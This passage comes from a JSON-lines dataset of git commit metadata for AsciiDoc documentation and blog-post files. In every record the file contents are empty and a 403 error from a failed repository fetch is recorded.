ticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,henakamaMSFT\/elasticsearch,elasticdog\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,JervyShi\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,vroyer\/elasticassandra,JervyShi\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra,liweinan0423\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch","old_file":"docs\/reference\/cat\/allocation.asciidoc","new_file":"docs\/reference\/cat\/allocation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14cf8b1701373579479c302d2d402d3e2b9e4163","subject":"zynq-boot now includes kernel modules, so moved kernel build instructions to a separate doc","message":"zynq-boot now includes kernel modules, so moved kernel build instructions to a separate doc\n\nChange-Id: I2e9ac44e43cc406633afefbefbee71ea2bf1966e\n","repos":"hanw\/connectal,chenm001\/connectal,hanw\/connectal,hanw\/connectal,8l\/connectal,cambridgehackers\/connectal,8l\/connectal,8l\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,hanw\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,cambridgehackers\/connectal,8l\/connectal,chenm001\/connectal,chenm001\/connectal,csail-csg\/connectal,8l\/connectal,csail-csg\/connectal,cambridgehackers\/connectal","old_file":"doc\/zynq-portal-driver.asciidoc","new_file":"doc\/zynq-portal-driver.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8cc06e236841cf9aa7813072170408382c2ebf","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95a6b0db0e34974e41190ae3f3b43d609fdafac","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a8a6dd70f866d22d6430df6ccacbf4d7ec4d1aa","subject":"Update 2015-02-06-the-blog-update.adoc","message":"Update 2015-02-06-the-blog-update.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-06-the-blog-update.adoc","new_file":"_posts\/2015-02-06-the-blog-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2efc4b036ff57b90f8d817bc2f84e87edd936e27","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219bef77f79c1784f42da3538f6e40385eceadcf","subject":"Update 2017-02-20-A-New-Obsession.adoc","message":"Update 2017-02-20-A-New-Obsession.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-20-A-New-Obsession.adoc","new_file":"_posts\/2017-02-20-A-New-Obsession.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bcc607a2a74bd09621f7e4910f2a9b878678275","subject":"Update 2017-05-31-Your-Blog-title.adoc","message":"Update 2017-05-31-Your-Blog-title.adoc","repos":"itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io","old_file":"_posts\/2017-05-31-Your-Blog-title.adoc","new_file":"_posts\/2017-05-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsallanillusion\/itsallanillusion.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60adb708b93ec491066d595622d4a1eabe704fef","subject":":memo: gh-pages favicon","message":":memo: gh-pages favicon\n","repos":"syon\/refills","old_file":"src\/refills\/github-pages\/favicon.adoc","new_file":"src\/refills\/github-pages\/favicon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78faf7a5a03a94b7c1900c8da985dbda464f0345","subject":"Update 2017-03-28-Your-Blog-title.adoc","message":"Update 2017-03-28-Your-Blog-title.adoc","repos":"codekiemcom\/codekiemcom.github.io","old_file":"_posts\/2017-03-28-Your-Blog-title.adoc","new_file":"_posts\/2017-03-28-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codekiemcom\/codekiemcom.github.io.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"7ff9c6a8ff3b6bfabedd1f369a8178e3498407a0","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49201c693676e039fd060a72b84e3d0acdb4186","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ea95cc3a326cbe783debead5a5ae4e4ff78c7da","subject":"SEC-2094: Document Concurrency Support","message":"SEC-2094: Document Concurrency Support\n","repos":"zshift\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,jmnarloch\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,ollie314\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,vitorgv\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,pkdevbox\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,zgscwjm\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,vitorgv\/spring-security,thomasdarimont\/spring-security,chinazhaoht\/spring-security,xingguang2013\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,wkorando\/spring-security,raindev\/spring-security,djechelon\/spring-security,ractive\/spring-security,spring-projects\/spring-security,mparaz\/spring-security,pwheel\/spring-security,forestqqqq\/spring-security,Xcorpio\/spring-security,pkdevbox\/spring-security,likaiwalkman\/spring-security,izeye\/spring-security,forestqqqq\/spring-security,zhaoqin102\/spring-security,hippostar\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,chinazhaoht\/spring-security,fhanik\/spring-security,MatthiasWinzeler\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,cyratech\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,fhanik\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,hippostar\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,adairtaosy\/spring-security,mparaz\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,panchenko\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,tekul\/spring-security,cyratech\/spring-security,pkdevbox\/spring-security,Krasnyanskiy\/spring-security,panchenko\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,mounb\/spring-security,ractive\/spring-security,ollie314\/spring-security,raindev\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,Peter32\/spring-security,izeye\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,ractive\/spring-security,xingguang2013\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,wilkinsona\/spring-security,xingguang2013\/spring-security,vitorgv\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,vitorgv\/spring-security,yinhe402\/spring-security,spring-projects\/spring-security,caiwenshu\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,driftman\/spring-security,Peter32\/spring-security,zshift\/spring-security,raindev\/spring-security,liuguohua\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,chinazhaoht\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,djechelon\/spring-security,mdeinum\/spring-security,ollie314\/spring-security,cyratech\/spring-security,Krasnyanskiy\/spring-security,pwheel\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,kazuki43zoo\/spring-security,mounb\/spring-security,zhaoqin102\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,driftman\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,panchenko\/spring-security,mdeinum\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,izeye\/spring-security,likaiwalkman\/spring-security,wilkinsona\/spring-security,fhanik\/spring-security,jmnarloch\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,izeye\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,ajdinhedzic\/spring-security,forestqqqq\/spring-security,wilkinsona\/spring-security,follow99\/spring-security,wkorando\/spring-security,wkorando\/spring-security,rwinch\/spring-security,Peter32\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pkdevbox\/spring-security,Xcorpio\/spring-security,zhaoqin102\/spring-security,yinhe402\/spring-security,mounb\/spring-security,yinhe402\/spring-security,zhaoqin102\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,raindev\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,olezhuravlev\/spring-security,mounb\/spring-security,mparaz\/spring-security,spring-projects\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,jgrandja\/spring-security,driftman\/spring-security,zshift\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,pwheel\/spring-security,zgscwjm\/spring-security,tekul\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"879016df6badda0ad10117be72763c2d7e8ef03b","subject":"Publish 2016-6-26-PHPER-array-merge.adoc","message":"Publish 2016-6-26-PHPER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-array-merge.adoc","new_file":"2016-6-26-PHPER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b5ce3ad7cb1245539dc737946c4a641825b862","subject":"CL note - Calculate MD5 hash","message":"CL note - Calculate MD5 hash\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d53f5f7db1eb38b4e2a51bf90d020c81a03de32","subject":"Correct ASCIIDoc markup","message":"Correct ASCIIDoc markup\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"693da9d1726069e8c9ea73133ff2f94b247d608d","subject":"Update 2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","message":"Update 2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","new_file":"_posts\/2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fcadc2cb6ff9fcea09699a436bcec2098dfd9f4","subject":"Update 2017-03-26-Fuck-yeah.adoc","message":"Update 2017-03-26-Fuck-yeah.adoc","repos":"AgustinQuetto\/AgustinQuetto.github.io","old_file":"_posts\/2017-03-26-Fuck-yeah.adoc","new_file":"_posts\/2017-03-26-Fuck-yeah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AgustinQuetto\/AgustinQuetto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d56b130eae7a00701935e5be464868f90a0be83","subject":"Add files via upload","message":"Add files via upload\n\nAdd multitier to v3 branch","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-multitier.adoc","new_file":"userguide\/tutorials\/aws-multitier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec44f65ca182e037eac40a356ebd157c370965a4","subject":"adding workshop-prereqs into resources section","message":"adding workshop-prereqs into resources section\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"resources\/workshop-prereqs.adoc","new_file":"resources\/workshop-prereqs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37f01fb72eb11fa9fb0d313df89d0a43aed7a6b2","subject":"Added jmh test results (#595)","message":"Added jmh test results (#595)\n\n","repos":"orange-buffalo\/dozer,garethahealy\/dozer,DozerMapper\/dozer,garethahealy\/dozer,DozerMapper\/dozer,orange-buffalo\/dozer","old_file":"tests\/dozer-jmh-tests\/results.adoc","new_file":"tests\/dozer-jmh-tests\/results.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garethahealy\/dozer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"771313fe12d31e83bcaf3fbf60aed58047780c39","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff1299f9a841f673f16e7091584bc001b446918","subject":"Update 2017-06-21-Creating-screencasts-on-Linux.adoc","message":"Update 2017-06-21-Creating-screencasts-on-Linux.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2706a9f45c45a3ae193c7ac57220b6fb544a0578","subject":"Gepubliceerd op 2016-02-16","message":"Gepubliceerd op 2016-02-16","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa430a38ac0cd3baca96b5b7acbcd5b019696e06","subject":"Update 2017-03-20-Elso-bejegyzes.adoc","message":"Update 2017-03-20-Elso-bejegyzes.adoc","repos":"bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io","old_file":"_posts\/2017-03-20-Elso-bejegyzes.adoc","new_file":"_posts\/2017-03-20-Elso-bejegyzes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bencekiraly\/bencekiraly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b700987fbf872ea3f27c9119b964b9daf4426890","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/dtfabric,libyal\/dtfabric","old_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtfabric.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"302ac4871447b768d350cac973560befb017c485","subject":"Add docs for creating and testing function invokers","message":"Add docs for creating and testing function invokers\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"Function-Invokers.adoc","new_file":"Function-Invokers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e25a76a6fcdbcf8898dea41de12d1d54ff66b60b","subject":"\u00c9nonc\u00e9 branching","message":"\u00c9nonc\u00e9 branching\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching.adoc","new_file":"Git\/Git branching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa7e2fb6603168d42064184c7b56a9c24062adc6","subject":"Update 2017-01-17-Project-Airspace.adoc","message":"Update 2017-01-17-Project-Airspace.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2017-01-17-Project-Airspace.adoc","new_file":"_posts\/2017-01-17-Project-Airspace.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83d35eb89a020c2bddad617bf4ff89b348d377f1","subject":"Update 2018-03-23-E-C2-Spring-Boot.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e56d880d9e2dfe55f625030f26b3631a570f8b","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa2474fdf23fda1dad2c45fd6854876816ab2695","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"659a6fcddcfc66a40f26a2dd321c88c90eac87f6","subject":"y2b create post New iPad Mini 2 \\","message":"y2b create post New iPad Mini 2 \\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-04-New-iPad-Mini-2-.adoc","new_file":"_posts\/2013-09-04-New-iPad-Mini-2-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5adb3d12141115ea77f1aa422e31be754e0394a1","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6623d6b5445624b505eba7c305e0ac93160f370","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730619d4c1df8c3a50de046cb0258e2703424816","subject":"Update 2016-10-17.adoc","message":"Update 